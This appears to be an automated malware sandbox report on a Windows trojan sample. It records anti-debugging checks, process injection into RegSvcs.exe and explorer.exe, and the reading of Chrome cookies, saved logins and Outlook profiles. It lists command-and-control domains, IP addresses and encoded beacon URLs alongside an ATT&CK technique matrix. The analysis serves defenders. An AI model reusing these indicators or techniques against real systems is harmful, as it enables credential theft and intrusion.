      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]1_2_013B1C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376C0A mov eax, dword ptr fs:[00000030h]1_2_01376C0A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376C0A mov eax, dword ptr fs:[00000030h]1_2_01376C0A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376C0A mov eax, dword ptr fs:[00000030h]1_2_01376C0A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376C0A mov eax, dword ptr fs:[00000030h]1_2_01376C0A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]1_2_0131B477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]1_2_0131B477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]1_2_0131B477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]1_2_0131B477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]1_2_0131B477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]1_2_0131B477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]1_2_0131B477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]1_2_0131B477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]1_2_0131B477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]1_2_0131B477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]1_2_0131B477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]1_2_0131B477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]1_2_0132AC7B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]1_2_0132AC7B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]1_2_0132AC7B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]1_2_0132AC7B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]1_2_0132AC7B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]1_2_0132AC7B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]1_2_0132AC7B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]1_2_0132AC7B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]1_2_0132AC7B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]1_2_0132AC7B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]1_2_0132AC7B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131746D mov eax, dword ptr fs:[00000030h]1_2_0131746D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138C450 mov eax, dword ptr fs:[00000030h]1_2_0138C450
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138C450 mov eax, dword ptr fs:[00000030h]1_2_0138C450
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132A44B mov eax, dword ptr fs:[00000030h]1_2_0132A44B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130849B mov eax, dword ptr fs:[00000030h]1_2_0130849B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]1_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]1_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]1_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]1_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]1_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]1_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]1_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]1_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]1_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]1_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]1_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]1_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]1_2_013B4496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B14FB mov eax, dword ptr fs:[00000030h]1_2_013B14FB
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376CF0 mov eax, dword ptr fs:[00000030h]1_2_01376CF0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376CF0 mov eax, dword ptr fs:[00000030h]1_2_01376CF0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376CF0 mov eax, dword ptr fs:[00000030h]1_2_01376CF0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C8CD6 mov eax, dword ptr fs:[00000030h]1_2_013C8CD6
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F4F2E mov eax, dword ptr fs:[00000030h]1_2_012F4F2E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F4F2E mov eax, dword ptr fs:[00000030h]1_2_012F4F2E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132E730 mov eax, dword ptr fs:[00000030h]1_2_0132E730
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B73D mov eax, dword ptr fs:[00000030h]1_2_0131B73D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B73D mov eax, dword ptr fs:[00000030h]1_2_0131B73D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131F716 mov eax, dword ptr fs:[00000030h]1_2_0131F716
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138FF10 mov eax, dword ptr fs:[00000030h]1_2_0138FF10
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138FF10 mov eax, dword ptr fs:[00000030h]1_2_0138FF10
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C070D mov eax, dword ptr fs:[00000030h]1_2_013C070D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C070D mov eax, dword ptr fs:[00000030h]1_2_013C070D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132A70E mov eax, dword ptr fs:[00000030h]1_2_0132A70E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132A70E mov eax, dword ptr fs:[00000030h]1_2_0132A70E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130FF60 mov eax, dword ptr fs:[00000030h]1_2_0130FF60
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C8F6A mov eax, dword ptr fs:[00000030h]1_2_013C8F6A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130EF40 mov eax, dword ptr fs:[00000030h]1_2_0130EF40
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01377794 mov eax, dword ptr fs:[00000030h]1_2_01377794
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01377794 mov eax, dword ptr fs:[00000030h]1_2_01377794
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01377794 mov eax, dword ptr fs:[00000030h]1_2_01377794
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01308794 mov eax, dword ptr fs:[00000030h]1_2_01308794
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013337F5 mov eax, dword ptr fs:[00000030h]1_2_013337F5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013AFE3F mov eax, dword ptr fs:[00000030h]1_2_013AFE3F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FE620 mov eax, dword ptr fs:[00000030h]1_2_012FE620
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132A61C mov eax, dword ptr fs:[00000030h]1_2_0132A61C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Process queried: DebugPort
      Source: C:\Windows\SysWOW64\NETSTAT.EXE; Process queried: DebugPort
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 1_2_01339910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_01339910
      Source: C:\Users\user\Desktop\NHYGUnNN.exe; Memory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Windows\explorer.exe; Network Connect: 38.55.236.89 80
      Source: C:\Windows\explorer.exe; Domain query: www.darkchocolatebliss.com
      Source: C:\Windows\explorer.exe; Domain query: www.marketmall.digital
      Source: C:\Windows\explorer.exe; Network Connect: 172.67.148.132 80
      Source: C:\Windows\explorer.exe; Network Connect: 54.38.220.85 80
      Source: C:\Windows\explorer.exe; Network Connect: 154.209.6.241 80
      Source: C:\Windows\explorer.exe; Network Connect: 89.31.143.1 80
      Source: C:\Windows\explorer.exe; Domain query: www.canadianlocalbusiness.com
      Source: C:\Windows\explorer.exe; Domain query: www.y31jaihdb6zm87.buzz
      Source: C:\Windows\explorer.exe; Network Connect: 162.213.255.142 80
      Source: C:\Windows\explorer.exe; Domain query: www.ope-cctv.com
      Source: C:\Windows\explorer.exe; Domain query: www.dersameh.com
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 1010000
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
      Source: C:\Windows\SysWOW64\NETSTAT.EXE; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\NETSTAT.EXE; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\NHYGUnNN.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
      Source: C:\Users\user\Desktop\NHYGUnNN.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
      Source: C:\Users\user\Desktop\NHYGUnNN.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AB0008
      Source: C:\Users\user\Desktop\NHYGUnNN.exe; Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
      Source: C:\Users\user\Desktop\NHYGUnNN.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread APC queued: target process: C:\Windows\explorer.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread register set: target process: 3452
      Source: C:\Windows\SysWOW64\NETSTAT.EXE; Thread register set: target process: 3452
      Source: C:\Users\user\Desktop\NHYGUnNN.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe
      Source: explorer.exe, 00000002.00000000.274805423.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.295428852.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.241334039.0000000001080000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: XProgram Manager
      Source: explorer.exe, 00000002.00000000.304298844.000000000835D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.253031171.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.274805423.0000000001080000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000002.00000000.295428852.0000000001080000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Program Manager (Not Responding)
      Source: explorer.exe, 00000002.00000000.274805423.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.295111764.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.274166451.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Progman
      Source: explorer.exe, 00000002.00000000.274805423.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.295428852.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.241334039.0000000001080000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\NHYGUnNN.exe; Queries volume information: C:\Users\user\Desktop\NHYGUnNN.exe VolumeInformation
      Source: C:\Users\user\Desktop\NHYGUnNN.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information

      Source: Yara match; File source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match; File source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match; File source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match; File source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match; File source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\NETSTAT.EXE; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
      Source: C:\Windows\SysWOW64\NETSTAT.EXE; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
      Source: C:\Windows\SysWOW64\NETSTAT.EXE; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Source: C:\Windows\SysWOW64\NETSTAT.EXE; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
      Source: C:\Windows\SysWOW64\NETSTAT.EXE; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
      Source: C:\Windows\SysWOW64\NETSTAT.EXE; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
      Source: C:\Windows\SysWOW64\NETSTAT.EXE; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State

      Remote Access Functionality

      Source: Yara match; File source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match; File source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match; File source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match; File source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match; File source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | 1 Shared Modules | Path Interception | 812 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Email Collection | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 3 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 31 Virtualization/Sandbox Evasion | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | Automated Exfiltration | 4 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 812 Process Injection | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 114 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
      Replication Through Removable Media | Launchd | Rc.common | Rc.common | 4 Obfuscated Files or Information | Cached Domain Credentials | 1 System Network Connections Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
      External Remote Services | Scheduled Task | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 13 System Information Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
      Behavior Graph (ID: 756156; Sample: NHYGUnNN.exe; Startdate: 29/11/2022; Architecture: WINDOWS; Score: 100): NHYGUnNN.exe started RegSvcs.exe; RegSvcs.exe injected explorer.exe; explorer.exe started NETSTAT.EXE.

      Source | Detection | Scanner | Label | Link
      NHYGUnNN.exe | 28% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla |
      NHYGUnNN.exe | 100% | Joe Sandbox ML | |

      No Antivirus matches

      Source | Detection | Scanner | Label | Link | Download
      1.0.RegSvcs.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File

      No Antivirus matches

      Source | Detection | Scanner | Label | Link
      http://www.marketmall.digital/4u5a/?GFQD=d2J0s&l0GX=+3a19pWtZng4d4VWOC/6zX+Mtu8c5OpbMBerEkzVlILtG/Qx1KaY9rLPGpDSvmBGoypiYd46AJSA/qrnjKpXW0Tn6YTEKB73Lei52b2L1E6m | 0% | Avira URL Cloud | safe |
      http://www.ope-cctv.com/4u5a/?GFQD=d2J0s&l0GX=PpVjBZYmN65mN/Cch5R9AL0rcoAD1LxI4sTzWlpX/jy1IrupfQnyd2YG9N8O4SbWoFYU5LvyeEtp38I885KIODFzvvn/7iZ+w1zSOWQrPDed | 0% | Avira URL Cloud | safe |
      http://www.y31jaihdb6zm87.buzz/4u5a/ | 0% | Avira URL Cloud | safe |
      www.needook.com/4u5a/ | 0% | Avira URL Cloud | safe |
      http://www.dersameh.com/4u5a/?l0GX=DO8SLO7p+ieBn2EC0oYIAc7qa4Xo4oKKhL6K9ytUp3CH+6ohEz4QzFDvrvyjA4KB81/r5tutyqTX+rvP+Yb6ZUWqEETpfEhrV3qJRCQNMeQd&GFQD=d2J0s | 0% | Avira URL Cloud | safe |
      http://www.marketmall.digital/4u5a/ | 0% | Avira URL Cloud | safe |
      http://www.darkchocolatebliss.com/4u5a/?GFQD=d2J0s&l0GX=pzMeEw2CLp9onsoEnnWxz7DjwWrmiPcXMIcMx0e8RMBYp3cHCqEf8wLsuyWBJtbijuVM0Zvb5p08kUy+wXRBHzYlQdhpzNTGfYmB4954z6O2 | 0% | Avira URL Cloud | safe |
      http://www.darkchocolatebliss.com/4u5a/ | 0% | Avira URL Cloud | safe |
      http://www.y31jaihdb6zm87.buzz/4u5a/?l0GX=odL+ljtDJZnnvHXGVqz6MYcHTNNFW2XRvrcwy4k99/9PUVuyA+q7lKaiZ8dF4agdsl/xXcCsqSWGiuLBWKJZJi8UVH1n7ApvhveD6637F7nt&GFQD=d2J0s | 0% | Avira URL Cloud | safe |
      http://www.dersameh.com/4u5a/ | 0% | Avira URL Cloud | safe |

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      www.darkchocolatebliss.com | 54.38.220.85 | true | true | | unknown
      www.marketmall.digital | 162.213.255.142 | true | true | | unknown
      www.canadianlocalbusiness.com | 172.67.148.132 | true | true | | unknown
      www.y31jaihdb6zm87.buzz | 154.209.6.241 | true | true | | unknown
      www.ope-cctv.com | 38.55.236.89 | true | true | | unknown
      www.dersameh.com | 89.31.143.1 | true | true | | unknown

      Name | Malicious | Antivirus Detection | Reputation
      http://www.y31jaihdb6zm87.buzz/4u5a/ | true | Avira URL Cloud: safe | unknown
      http://www.marketmall.digital/4u5a/?GFQD=d2J0s&l0GX=+3a19pWtZng4d4VWOC/6zX+Mtu8c5OpbMBerEkzVlILtG/Qx1KaY9rLPGpDSvmBGoypiYd46AJSA/qrnjKpXW0Tn6YTEKB73Lei52b2L1E6m | true | Avira URL Cloud: safe | unknown
      http://www.ope-cctv.com/4u5a/?GFQD=d2J0s&l0GX=PpVjBZYmN65mN/Cch5R9AL0rcoAD1LxI4sTzWlpX/jy1IrupfQnyd2YG9N8O4SbWoFYU5LvyeEtp38I885KIODFzvvn/7iZ+w1zSOWQrPDed | true | Avira URL Cloud: safe | unknown
      http://www.dersameh.com/4u5a/?l0GX=DO8SLO7p+ieBn2EC0oYIAc7qa4Xo4oKKhL6K9ytUp3CH+6ohEz4QzFDvrvyjA4KB81/r5tutyqTX+rvP+Yb6ZUWqEETpfEhrV3qJRCQNMeQd&GFQD=d2J0s | true | Avira URL Cloud: safe | unknown
      http://www.marketmall.digital/4u5a/ | true | Avira URL Cloud: safe | unknown
      www.needook.com/4u5a/ | true | Avira URL Cloud: safe | low
      http://www.darkchocolatebliss.com/4u5a/?GFQD=d2J0s&l0GX=pzMeEw2CLp9onsoEnnWxz7DjwWrmiPcXMIcMx0e8RMBYp3cHCqEf8wLsuyWBJtbijuVM0Zvb5p08kUy+wXRBHzYlQdhpzNTGfYmB4954z6O2 | true | Avira URL Cloud: safe | unknown
      http://www.y31jaihdb6zm87.buzz/4u5a/?l0GX=odL+ljtDJZnnvHXGVqz6MYcHTNNFW2XRvrcwy4k99/9PUVuyA+q7lKaiZ8dF4agdsl/xXcCsqSWGiuLBWKJZJi8UVH1n7ApvhveD6637F7nt&GFQD=d2J0s | true | Avira URL Cloud: safe | unknown
      http://www.dersameh.com/4u5a/ | true | Avira URL Cloud: safe | unknown
      http://www.darkchocolatebliss.com/4u5a/ | true | Avira URL Cloud: safe | unknown

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://ac.ecosia.org/autocomplete?q=1--Lt08NN.10.drfalse
                    high
                    https://search.yahoo.com?fr=crmas_sfp1--Lt08NN.10.drfalse
                      high
                      http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000000.295111764.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.274166451.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.304813988.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.240724345.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.283521778.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.253709611.0000000008442000.00000004.00000001.00020000.00000000.sdmpfalse
                        high
                        https://duckduckgo.com/chrome_newtab1--Lt08NN.10.drfalse
                          high
                          https://duckduckgo.com/ac/?q=1--Lt08NN.10.drfalse
                            high
                            https://www.google.com/images/branding/product/ico/googleg_lodp.ico1--Lt08NN.10.drfalse
                              high
                              https://search.yahoo.com?fr=crmas_sfpf1--Lt08NN.10.drfalse
                                high
                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=1--Lt08NN.10.drfalse
                                  high
                                  https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search1--Lt08NN.10.drfalse
                                    high
                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=1--Lt08NN.10.drfalse
                                      high
                                      https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=1--Lt08NN.10.drfalse
                                        high
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
